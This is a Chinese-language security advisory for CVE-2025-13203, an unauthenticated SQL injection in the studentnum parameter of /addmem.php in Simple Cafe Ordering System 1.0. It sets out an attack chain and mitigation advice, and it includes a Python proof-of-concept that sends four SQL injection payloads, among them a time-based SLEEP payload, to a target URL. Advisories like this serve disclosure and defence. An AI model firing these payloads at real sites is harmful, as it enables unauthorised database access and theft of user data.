CVE-2025-13203 Simple Cafe Ordering System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13203

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Simple Cafe Ordering System 1.0

漏洞概述

CVE-2025-13203是code-projects开源项目Simple Cafe Ordering System 1.0版本中发现的高危SQL注入漏洞。该漏洞存在于/addmem.php文件中，攻击者可通过studentnum参数注入恶意SQL代码。由于漏洞位于用户注册功能模块，且无需认证即可利用，远程攻击者可直接通过HTTP请求触发该漏洞。成功利用此漏洞可导致数据库敏感信息泄露、用户数据篡改，甚至在某些配置下可能实现远程代码执行。该漏洞的CVSS评分为7.3，属于高危级别，攻击复杂度低，无需特殊权限或用户交互。漏洞利用代码已在公开渠道发布，潜在威胁较高。建议受影响的用户尽快采取修复措施或应用临时缓解方案。

技术细节

该SQL注入漏洞位于Simple Cafe Ordering System的/addmem.php文件中的studentnum参数。攻击者可在用户注册过程中，通过构造特殊的studentnum参数值，注入任意SQL语句。由于应用程序未对用户输入进行充分的参数化查询或输入过滤，恶意SQL代码将被数据库服务器执行。攻击者可利用UNION SELECT、布尔盲注、时间盲注等技术提取数据库中的敏感信息，包括用户凭证、管理员账户数据等。在某些数据库配置下，攻击者还可能通过 INTO OUTFILE 或 xp_cmdshell 等功能实现文件系统写入或系统命令执行。建议开发者使用参数化查询（Prepared Statements）重构所有数据库交互代码，并对用户输入实施严格的输入验证和白名单过滤机制。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Simple Cafe Ordering System 1.0版本，确认/addmem.php注册页面可访问

STEP 2

步骤2: 构造恶意请求

攻击者构造包含SQL注入载荷的HTTP POST请求，将studentnum参数设置为恶意SQL语句

STEP 3

步骤3: 发送攻击载荷

通过HTTP请求将SQL注入载荷发送至目标服务器的/addmem.php端点

STEP 4

步骤4: 数据库注入执行

恶意SQL代码被数据库服务器执行，绕过正常业务逻辑

STEP 5

步骤5: 数据窃取或篡改

根据注入的SQL语句类型，攻击者可提取敏感数据、修改用户信息或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-13203 PoC - SQL Injection in Simple Cafe Ordering System # Target: /addmem.php parameter: studentnum def exploit_sql_injection(target_url): """ SQL Injection PoC for CVE-2025-13203 Target: Simple Cafe Ordering System 1.0 Vulnerable File: /addmem.php Vulnerable Parameter: studentnum """ # Target endpoint endpoint = f"{target_url}/addmem.php" # SQL Injection payloads payloads = [ "' OR '1'='1' --", "' UNION SELECT NULL,NULL,NULL --", "' AND SLEEP(5) --", "' OR 1=1 LIMIT 1 --" ] # Normal registration data data = { "studentnum": "12345678", "fullname": "Test User", "email": "[email protected]", "phone": "1234567890", "address": "Test Address" } print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-13203") print(f"[*] Testing {len(payloads)} payloads...") for i, payload in enumerate(payloads, 1): test_data = data.copy() test_data["studentnum"] = payload try: response = requests.post(endpoint, data=test_data, timeout=10) print(f"[+] Payload {i}: {payload}") print(f" Status: {response.status_code}") print(f" Response Length: {len(response.text)}") # Check for SQL error indicators if "sql" in response.text.lower() or "mysql" in response.text.lower(): print(f" [!] Potential SQL error detected!") except requests.exceptions.RequestException as e: print(f"[-] Error with payload {i}: {e}") print("[*] PoC execution completed") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_sql_injection(target)

影响范围

code-projects Simple Cafe Ordering System 1.0

防御指南

临时缓解措施

临时缓解措施：在Web应用防火墙中配置规则，过滤包含SQL注入特征的请求，如单引号、双破折号、UNION SELECT等关键字。限制/addmem.php页面的访问频率，防止自动化攻击。对数据库账户实施最小权限原则，限制其对敏感表的访问权限。同时建议尽快升级到官方发布的安全补丁版本或寻找替代方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13203
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13203
3 Details https://www.cvedetails.com/cve/CVE-2025-13203/
4 VulDB https://vuldb.com/cve/CVE-2025-13203
5 Link https://code-projects.org/
6 Link https://github.com/JasonCyberYu/SimpleCafe/issues/1
7 Link https://vuldb.com/?ctiid.332501
8 Link https://vuldb.com/?id.332501
9 Link https://vuldb.com/?submit.686708